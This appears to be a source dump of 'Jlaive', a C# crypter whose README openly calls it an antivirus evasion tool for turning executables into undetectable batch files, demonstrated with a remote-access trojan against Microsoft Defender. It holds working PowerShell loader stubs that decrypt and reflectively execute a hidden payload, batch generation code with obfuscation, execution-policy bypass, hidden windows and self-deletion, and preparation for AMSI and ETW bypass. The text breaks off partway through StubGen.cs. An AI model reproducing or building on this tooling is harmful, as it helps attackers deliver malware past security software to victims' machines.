├── version ├── Jlaive ├── Resources │ ├── runpe.dll │ ├── apiunhooker.dll │ ├── XORStub.ps1 │ ├── AESStub.ps1 │ └── Stub.cs ├── FodyWeavers.xml ├── App.config ├── Properties │ ├── Settings.settings │ ├── Settings.Designer.cs │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ └── Resources.resx ├── Misc │ ├── Settings.cs │ └── Utils.cs ├── Program.cs ├── CodeGen │ ├── FileGen.cs │ └── StubGen.cs ├── CodeMod │ ├── Obfuscator.cs │ └── Patcher.cs ├── packages.config ├── Form1.resx ├── FodyWeavers.xsd ├── Form1.cs ├── Jlaive.csproj └── Form1.Designer.cs ├── LICENSE ├── Jlaive.sln └── README.md /version: -------------------------------------------------------------------------------- 1 | v1.2.2 2 | -------------------------------------------------------------------------------- /Jlaive/Resources/runpe.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/Jlaive/HEAD/Jlaive/Resources/runpe.dll -------------------------------------------------------------------------------- /Jlaive/Resources/apiunhooker.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ksecurity45/Jlaive/HEAD/Jlaive/Resources/apiunhooker.dll -------------------------------------------------------------------------------- /Jlaive/FodyWeavers.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /Jlaive/App.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Jlaive/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Jlaive/Resources/XORStub.ps1: -------------------------------------------------------------------------------- 1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine); 2 | $lastline_var = $contents_var[$contents_var.Length - 1]; 3 | $payload_var = [System.Convert]::FromBase64String($lastline_var); 4 | $key_var = [System.Convert]::FromBase64String('DECRYPTION_KEY'); 5 | for ($i = 0; $i -le $payload_var.Length; $i++) { $payload_var[$i] = ($payload_var[$i] -bxor $key_var[$i % $key_var.Length]); }; 6 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var); 7 | $mso_var = New-Object System.IO.MemoryStream; 8 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress); 9 | $gs_var.CopyTo($mso_var); 10 | $gs_var.Dispose(); 11 | $msi_var.Dispose(); 12 | $mso_var.Dispose(); 13 | $payload_var = $mso_var.ToArray(); 14 | [System.Reflection.Assembly]::Load($payload_var).EntryPoint.Invoke($null, (, [string[]] ('%*'))) -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 chash 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Jlaive/Misc/Settings.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using Newtonsoft.Json; 4 | 5 | namespace Jlaive 6 | { 7 | public class Settings 8 | { 9 | private static string savepath = AppDomain.CurrentDomain.BaseDirectory + "\\bin\\settings.json"; 10 | 11 | public static SettingsObject Load() 12 | { 13 | if (File.Exists(savepath)) 14 | { 15 | return JsonConvert.DeserializeObject(File.ReadAllText(savepath)); 16 | } 17 | return null; 18 | } 19 | 20 | public static void Save(SettingsObject obj) => File.WriteAllText(savepath, JsonConvert.SerializeObject(obj, Formatting.Indented)); 21 | } 22 | 23 | public class SettingsObject 24 | { 25 | public string inputFile { get; set; } 26 | public bool antiDebug { get; set; } 27 | public bool antiVM { get; set; } 28 | public bool selfDelete { get; set; } 29 | public bool hidden { get; set; } 30 | public bool aes { get; set; } 31 | public bool xor { get; set; } 32 | public string[] bindedFiles { get; set; } 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /Jlaive.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.2.32516.85 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Jlaive", "Jlaive\Jlaive.csproj", "{D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {D6BBA820-E9F7-4DA3-A7D2-90A73871C0DA}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {C6803204-4415-411E-8D02-0D633E212A8A} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Jlaive/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Jlaive.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Jlaive/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | using System.Windows.Forms; 6 | 7 | namespace Jlaive 8 | { 9 | internal static class Program 10 | { 11 | [DllImport("user32.dll")] 12 | private static extern bool SetProcessDPIAware(); 13 | 14 | [STAThread] 15 | static void Main() 16 | { 17 | string path = Process.GetCurrentProcess().MainModule.FileName; 18 | if (path.IndexOf(Path.GetTempPath(), StringComparison.OrdinalIgnoreCase) == 0) 19 | { 20 | MessageBox.Show("Jlaive cannot be run from a ZIP file! Please extract before running.", "Error", MessageBoxButtons.OK, MessageBoxIcon.Error); 21 | Environment.Exit(1); 22 | } 23 | if (!Directory.Exists(AppDomain.CurrentDomain.BaseDirectory + "\\bin")) Directory.CreateDirectory(AppDomain.CurrentDomain.BaseDirectory + "\\bin"); 24 | SetProcessDPIAware(); 25 | Application.EnableVisualStyles(); 26 | Application.SetCompatibleTextRenderingDefault(false); 27 | Application.Run(new Form1()); 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /Jlaive/Resources/AESStub.ps1: -------------------------------------------------------------------------------- 1 | $contents_var = [System.IO.File]::ReadAllText('%~f0').Split([Environment]::NewLine); 2 | $lastline_var = $contents_var[$contents_var.Length - 1]; 3 | $payload_var = [System.Convert]::FromBase64String($lastline_var); 4 | $aes_var = New-Object System.Security.Cryptography.AesManaged; 5 | $aes_var.Mode = [System.Security.Cryptography.CipherMode]::CBC; 6 | $aes_var.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; 7 | $aes_var.Key = [System.Convert]::FromBase64String('DECRYPTION_KEY'); 8 | $aes_var.IV = [System.Convert]::FromBase64String('DECRYPTION_IV'); 9 | $decryptor_var = $aes_var.CreateDecryptor(); 10 | $payload_var = $decryptor_var.TransformFinalBlock($payload_var, 0, $payload_var.Length); 11 | $decryptor_var.Dispose(); 12 | $aes_var.Dispose(); 13 | $msi_var = New-Object System.IO.MemoryStream(, $payload_var); 14 | $mso_var = New-Object System.IO.MemoryStream; 15 | $gs_var = New-Object System.IO.Compression.GZipStream($msi_var, [IO.Compression.CompressionMode]::Decompress); 16 | $gs_var.CopyTo($mso_var); 17 | $gs_var.Dispose(); 18 | $msi_var.Dispose(); 19 | $mso_var.Dispose(); 20 | $payload_var = $mso_var.ToArray(); 21 | [System.Reflection.Assembly]::Load($payload_var).EntryPoint.Invoke($null, (, [string[]] ('%*'))) -------------------------------------------------------------------------------- /Jlaive/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("Jlaive")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Jlaive")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d6bba820-e9f7-4da3-a7d2-90a73871c0da")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Jlaive/CodeGen/FileGen.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | 4 | namespace Jlaive 5 | { 6 | public class FileGen 7 | { 8 | public static string CreateBat(byte[] key, byte[] iv, EncryptionMode mode, bool hidden, bool selfdelete, Random rng) 9 | { 10 | string command = StubGen.CreatePS(key, iv, mode, rng); 11 | StringBuilder output = new StringBuilder(); 12 | output.AppendLine("@echo off"); 13 | 14 | (string, string) obfuscated = Obfuscator.GenCodeBat(@"copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", rng, 4); 15 | output.AppendLine(obfuscated.Item1); 16 | output.AppendLine(obfuscated.Item2 + " \"%~dp0%~nx0.exe\" /y"); 17 | 18 | output.AppendLine("cls"); 19 | obfuscated = Obfuscator.GenCodeBat("cd %~dp0", rng, 4); 20 | output.AppendLine(obfuscated.Item1); 21 | output.AppendLine(obfuscated.Item2); 22 | 23 | string commandstart = $"-noprofile {(hidden ? "-windowstyle hidden" : string.Empty)} -executionpolicy bypass -command "; 24 | obfuscated = Obfuscator.GenCodeBat(commandstart, rng, 2); 25 | output.AppendLine(obfuscated.Item1); 26 | (string, string) obfuscated2 = Obfuscator.GenCodeBat(command, rng, 2); 27 | output.AppendLine(obfuscated2.Item1); 28 | output.AppendLine("\"%~nx0.exe\" " + obfuscated.Item2 + obfuscated2.Item2); 29 | 30 | if (selfdelete) output.AppendLine("(goto) 2>nul & del \"%~f0\""); 31 | output.AppendLine("exit /b"); 32 | return output.ToString(); 33 | } 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Jlaive 2 | 3 | Jlaive is an antivirus evasion tool that can convert executables into undetectable batch files. Obfuscated .NET assemblies are not guaranteed to work. 4 | 5 | Join the Discord server for discussion and enquiries: https://discord.gg/Qzyq3Dqn82. 6 | 7 | ![image](https://media.discordapp.net/attachments/959762900443070485/987900379863846962/Untitled.png) 8 | 9 | ## Features 10 | - .NET/Native (x64) support 11 | - AES/XOR encryption 12 | - Compression 13 | - Anti Debug 14 | - Anti VM 15 | - Melt file (self delete) 16 | - Bind files 17 | - AMSI bypass 18 | - ETW bypass 19 | - API unhooking 20 | 21 | ## Screenshots 22 | 23 | ![image](https://media.discordapp.net/attachments/961905736139554876/982925324071338014/unknown.png) 24 | ![image](https://media.discordapp.net/attachments/961905736139554876/982925618377281536/unknown.png) 25 | 26 | Demo video with [AsyncRat](https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp) vs Microsoft Defender: https://vimeo.com/717794371 27 | 28 | ## Donate 29 | XMR: 47sQ8jVWGtb8iA5zJnnHmfFmu8GwibMs94JbhtutW9HNeYx9UAxWUNNF3NfE79pGm8bCBCFaF3R6CQEYADoF5Uv38m25SNt 30 | 31 | ## Known issues 32 | 33 | - `Hidden` option does not work on Windows Terminal. 34 | - Not compatible with Python EXEs. 35 | 36 | ## To-do 37 | 38 | - Fix XOR encryption 39 | - Implement new GUI 40 | 41 | ## Credits 42 | 43 | C# RunPE: [https://github.com/nettitude/RunPE](https://github.com/nettitude/RunPE) 44 | 45 | SharpUnhooker: [https://github.com/GetRektBoy724/SharpUnhooker](https://github.com/GetRektBoy724/SharpUnhooker) 46 | 47 | ## Disclaimer 48 | This project was made for educational purposes only. I am not responsible if you choose to use this illegally/maliciously. 49 | -------------------------------------------------------------------------------- /Jlaive/CodeMod/Obfuscator.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | 5 | using static Jlaive.Utils; 6 | 7 | namespace Jlaive 8 | { 9 | public class Obfuscator 10 | { 11 | public static (string, string) GenCodeBat(string input, Random rng, int level = 5) 12 | { 13 | string ret = string.Empty; 14 | string[] lines = input.Split(new string[] { Environment.NewLine }, StringSplitOptions.None); 15 | 16 | int amount = 5; 17 | if (level > 1) amount -= level; 18 | amount *= 2; 19 | 20 | List setlines = new List(); 21 | List linevars = new List(); 22 | foreach (string line in lines) 23 | { 24 | List splitted = new List(); 25 | string sc = string.Empty; 26 | bool invar = false; 27 | foreach (char c in line) 28 | { 29 | if (c == '%') 30 | { 31 | invar = !invar; 32 | sc += c; 33 | continue; 34 | } 35 | if (c == ' ' && invar) 36 | { 37 | invar = false; 38 | sc += c; 39 | continue; 40 | } 41 | if (!invar && sc.Length >= amount) 42 | { 43 | splitted.Add(sc); 44 | invar = false; 45 | sc = string.Empty; 46 | } 47 | sc += c; 48 | } 49 | splitted.Add(sc); 50 | 51 | List vars = new List(); 52 | foreach (string s in splitted) 53 | { 54 | string name = RandomString(10, rng); 55 | setlines.Add($"set \"{name}={s}\""); 56 | vars.Add(name); 57 | } 58 | linevars.Add(vars.ToArray()); 59 | } 60 | 61 | setlines = new List(setlines.OrderBy(x => rng.Next())); 62 | for (int i = 0; i < setlines.Count; i++) 63 | { 64 | ret += setlines[i]; 65 | int r = rng.Next(0, 2); 66 | if (r == 0 || i == setlines.Count - 1) ret += Environment.NewLine; 67 | else ret += " & "; 68 | } 69 | 70 | string varcalls = string.Empty; 71 | foreach (string[] line in linevars) 72 | { 73 | foreach (string s in line) varcalls += $"%{s}%"; 74 | varcalls += Environment.NewLine; 75 | } 76 | return (ret.TrimEnd('\r', '\n'), varcalls.TrimEnd('\r', '\n')); 77 | } 78 | } 79 | } -------------------------------------------------------------------------------- /Jlaive/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Jlaive.Properties 12 | { 13 | 14 | 15 | ///

16 | /// A strongly-typed resource class, for looking up localized strings, etc. 17 | ///

18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources 26 | { 27 | 28 | private static global::System.Resources.ResourceManager resourceMan; 29 | 30 | private static global::System.Globalization.CultureInfo resourceCulture; 31 | 32 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 33 | internal Resources() 34 | { 35 | } 36 | 37 | ///

38 | /// Returns the cached ResourceManager instance used by this class. 39 | ///

40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 41 | internal static global::System.Resources.ResourceManager ResourceManager 42 | { 43 | get 44 | { 45 | if ((resourceMan == null)) 46 | { 47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Jlaive.Properties.Resources", typeof(Resources).Assembly); 48 | resourceMan = temp; 49 | } 50 | return resourceMan; 51 | } 52 | } 53 | 54 | ///

55 | /// Overrides the current thread's CurrentUICulture property for all 56 | /// resource lookups using this strongly typed resource class. 57 | ///

58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 59 | internal static global::System.Globalization.CultureInfo Culture 60 | { 61 | get 62 | { 63 | return resourceCulture; 64 | } 65 | set 66 | { 67 | resourceCulture = value; 68 | } 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /Jlaive/CodeMod/Patcher.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Reflection; 6 | 7 | using dnlib.DotNet; 8 | using dnlib.DotNet.Emit; 9 | 10 | namespace Jlaive 11 | { 12 | public class Patcher 13 | { 14 | public static byte[] Fix(byte[] input) 15 | { 16 | ModuleDef module = ModuleDefMD.Load(input); 17 | foreach (TypeDef type in module.GetTypes()) 18 | { 19 | if (type.IsGlobalModuleType) continue; 20 | foreach (MethodDef method in type.Methods) 21 | { 22 | if (!method.HasBody) continue; 23 | IList instr = method.Body.Instructions; 24 | for (var i = 0; i < instr.Count; i++) 25 | { 26 | if (instr[i].ToString().Contains("System.Diagnostics.ProcessModule::get_FileName()")) 27 | { 28 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe")); 29 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat")); 30 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1)))); 31 | } 32 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::get_Location()")) 33 | { 34 | instr.Insert(i + 1, OpCodes.Ldstr.ToInstruction(".bat.exe")); 35 | instr.Insert(i + 2, OpCodes.Ldstr.ToInstruction(".bat")); 36 | instr.Insert(i + 3, OpCodes.Callvirt.ToInstruction(method.Module.Import(GetSystemMethod(typeof(string), "Replace", 1)))); 37 | } 38 | else if (instr[i].ToString().Contains("System.Reflection.Assembly::GetEntryAssembly()")) 39 | { 40 | instr[i] = OpCodes.Call.ToInstruction(method.Module.Import(GetSystemMethod(typeof(Assembly), "GetExecutingAssembly"))); 41 | } 42 | } 43 | method.Body.SimplifyBranches(); 44 | } 45 | } 46 | MemoryStream ms = new MemoryStream(); 47 | module.Write(ms); 48 | byte[] output = ms.ToArray(); 49 | ms.Dispose(); 50 | return output; 51 | } 52 | 53 | private static MethodDef GetSystemMethod(Type type, string name, int idx = 0) 54 | { 55 | string filename = type.Module.FullyQualifiedName; 56 | ModuleDefMD module = ModuleDefMD.Load(filename); 57 | TypeDef[] types = module.GetTypes().ToArray(); 58 | List methods = new List(); 59 | foreach (TypeDef t in types) 60 | { 61 | if (t.Name != type.Name) continue; 62 | foreach (var m in t.Methods) 63 | { 64 | 65 | if (m.Name != name) continue; 66 | methods.Add(m); 67 | } 68 | } 69 | if (methods.Count > 0) return methods[idx]; 70 | return null; 71 | } 72 | } 73 | } 74 | -------------------------------------------------------------------------------- /Jlaive/Misc/Utils.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.IO.Compression; 4 | using System.Linq; 5 | using System.Reflection; 6 | using System.Security.Cryptography; 7 | 8 | namespace Jlaive 9 | { 10 | public enum EncryptionMode 11 | { 12 | AES, 13 | XOR 14 | } 15 | 16 | public class Utils 17 | { 18 | public static byte[] GetEmbeddedResource(string name) 19 | { 20 | Assembly asm = Assembly.GetExecutingAssembly(); 21 | MemoryStream ms = new MemoryStream(); 22 | Stream stream = asm.GetManifestResourceStream(name); 23 | stream.CopyTo(ms); 24 | stream.Dispose(); 25 | byte[] ret = ms.ToArray(); 26 | ms.Dispose(); 27 | return ret; 28 | } 29 | 30 | public static string GetEmbeddedString(string name) 31 | { 32 | Assembly asm = Assembly.GetExecutingAssembly(); 33 | StreamReader stream = new StreamReader(asm.GetManifestResourceStream(name)); 34 | string ret = stream.ReadToEnd(); 35 | stream.Close(); 36 | stream.Dispose(); 37 | return ret; 38 | } 39 | 40 | public static byte[] Encrypt(EncryptionMode type, byte[] input, byte[] key, byte[] iv) 41 | { 42 | switch (type) 43 | { 44 | case EncryptionMode.AES: 45 | { 46 | AesManaged aes = new AesManaged(); 47 | aes.Mode = CipherMode.CBC; 48 | aes.Padding = PaddingMode.PKCS7; 49 | ICryptoTransform encryptor = aes.CreateEncryptor(key, iv); 50 | byte[] encrypted = encryptor.TransformFinalBlock(input, 0, input.Length); 51 | encryptor.Dispose(); 52 | aes.Dispose(); 53 | return encrypted; 54 | } 55 | case EncryptionMode.XOR: 56 | { 57 | for (int i = 0; i < input.Length; i++) 58 | { 59 | input[i] = (byte)(input[i] ^ key[i % key.Length]); 60 | } 61 | return input; 62 | } 63 | } 64 | return null; 65 | } 66 | 67 | public static byte[] Compress(byte[] bytes) 68 | { 69 | MemoryStream msi = new MemoryStream(bytes); 70 | MemoryStream mso = new MemoryStream(); 71 | GZipStream gs = new GZipStream(mso, CompressionMode.Compress); 72 | msi.CopyTo(gs); 73 | gs.Dispose(); 74 | mso.Dispose(); 75 | msi.Dispose(); 76 | return mso.ToArray(); 77 | } 78 | 79 | public static string RandomString(int length, Random rng) 80 | { 81 | string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 82 | return new string(Enumerable.Repeat(chars, length).Select(s => s[rng.Next(s.Length)]).ToArray()); 83 | } 84 | 85 | public static bool IsAssembly(string path) 86 | { 87 | try 88 | { 89 | AssemblyName.GetAssemblyName(path); 90 | return true; 91 | } 92 | catch 93 | { 94 | return false; 95 | } 96 | } 97 | } 98 | } 99 | -------------------------------------------------------------------------------- /Jlaive/packages.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | -------------------------------------------------------------------------------- /Jlaive/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | text/microsoft-resx 107 | 108 | 109 | 2.0 110 | 111 | 112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 113 | 114 | 115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | -------------------------------------------------------------------------------- /Jlaive/Form1.resx: -------------------------------------------------------------------------------- 1 | 2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | -------------------------------------------------------------------------------- /Jlaive/CodeGen/StubGen.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.IO; 3 | using System.Reflection; 4 | using System.Text; 5 | 6 | using static Jlaive.Utils; 7 | 8 | namespace Jlaive 9 | { 10 | public class StubGen 11 | { 12 | public static string CreatePS(byte[] key, byte[] iv, EncryptionMode mode, Random rng) 13 | { 14 | string contents_var = RandomString(5, rng); 15 | string lastline_var = RandomString(5, rng); 16 | string payload_var = RandomString(5, rng); 17 | string key_var = RandomString(5, rng); 18 | string aes_var = RandomString(5, rng); 19 | string decryptor_var = RandomString(5, rng); 20 | string msi_var = RandomString(5, rng); 21 | string mso_var = RandomString(5, rng); 22 | string gs_var = RandomString(5, rng); 23 | 24 | if (mode == EncryptionMode.AES) 25 | { 26 | string stubcode = GetEmbeddedString("Jlaive.Resources.AESStub.ps1"); 27 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key)); 28 | stubcode = stubcode.Replace("DECRYPTION_IV", Convert.ToBase64String(iv)); 29 | stubcode = stubcode.Replace("contents_var", contents_var); 30 | stubcode = stubcode.Replace("lastline_var", lastline_var); 31 | stubcode = stubcode.Replace("payload_var", payload_var); 32 | stubcode = stubcode.Replace("aes_var", aes_var); 33 | stubcode = stubcode.Replace("decryptor_var", decryptor_var); 34 | stubcode = stubcode.Replace("msi_var", msi_var); 35 | stubcode = stubcode.Replace("mso_var", mso_var); 36 | stubcode = stubcode.Replace("gs_var", gs_var); 37 | stubcode = stubcode.Replace(Environment.NewLine, string.Empty); 38 | return stubcode; 39 | } 40 | else 41 | { 42 | string stubcode = GetEmbeddedString("Jlaive.Resources.XORStub.ps1"); 43 | stubcode = stubcode.Replace("DECRYPTION_KEY", Convert.ToBase64String(key)); 44 | stubcode = stubcode.Replace("contents_var", contents_var); 45 | stubcode = stubcode.Replace("lastline_var", lastline_var); 46 | stubcode = stubcode.Replace("payload_var", payload_var); 47 | stubcode = stubcode.Replace("key_var", key_var); 48 | stubcode = stubcode.Replace("msi_var", msi_var); 49 | stubcode = stubcode.Replace("mso_var", mso_var); 50 | stubcode = stubcode.Replace("gs_var", gs_var); 51 | stubcode = stubcode.Replace(Environment.NewLine, string.Empty); 52 | return stubcode; 53 | } 54 | } 55 | 56 | public static string CreateCS(byte[] key, byte[] iv, EncryptionMode mode, bool antidebug, bool antivm, bool native, Random rng) 57 | { 58 | string namespacename = RandomString(20, rng); 59 | string classname = RandomString(20, rng); 60 | string aesfunction = RandomString(20, rng); 61 | string uncompressfunction = RandomString(20, rng); 62 | string gerfunction = RandomString(20, rng); 63 | string virtualprotect = RandomString(20, rng); 64 | string checkremotedebugger = RandomString(20, rng); 65 | string isdebuggerpresent = RandomString(20, rng); 66 | 67 | string amsiscanbuffer_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("AmsiScanBuffer"), key, iv)); 68 | string etweventwrite_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("EtwEventWrite"), key, iv)); 69 | 70 | string checkremotedebugger_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("CheckRemoteDebuggerPresent"), key, iv)); 71 | string isdebuggerpresent_str = Convert.ToBase64String(Encrypt(mode, Encoding.UTF8.GetBytes("IsDebuggerPresent"), key, iv)); 72 | string payloadtxt_str = 